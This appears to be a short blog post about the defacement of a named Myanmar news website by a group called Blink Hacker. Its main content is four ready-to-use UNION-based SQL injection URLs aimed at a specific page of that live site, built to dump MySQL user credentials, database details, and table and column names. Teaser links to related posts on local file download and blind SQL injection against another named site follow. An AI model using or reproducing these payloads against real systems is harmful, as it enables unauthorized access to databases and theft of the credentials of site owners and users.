A hacker group named themselves BLINK HACKER hacked http://www.khitlunge.net.mm and it’s a social and news site for Myanmar Latest News, Myanmar Breaking News, Myanmar Update News.

I don’t know how they attack and defaced but one of my team member reported and mailed me yesterday before Blink Hacker defaced it.

SQL Injection of Khitlunge.net.mm is as follow..

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28user,0x3a,password%29,4,5,6%20from%20mysql.user--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,4,5,6--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28column_name%29,4,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29--

Explore More

Local File Download Theory

1 What's Local File Download(LFD)? - Local file download is kind of misconfigured web master or webdeveloper on php application. 2 Effect 2.1 Personal/website - You will able to view

Read More

The internet crash of July 17th 1997

This July 17th marks the eleventh anniversary of the famous internet crash. How did the internet crash; the network which was designed to withstand all sorts of catastrophe; even the

Read More

Critical Blind SQL Injection (vulnerability) in The Best Myanmar Website (burmeseclassic.com)

PlanetCreator has reported another critical Blind SQL Injection (vulnerability) on http://www.burmeseclassic.com/ This vulnerability has been alerted to :- Webmaster of BurmeseClassic Applications: ———— PlanetCreator’s_Universal_Advanced_Internet_Security_T00L System Time: ———— (UTC+08:00) Yangoon, Myanmar

Read More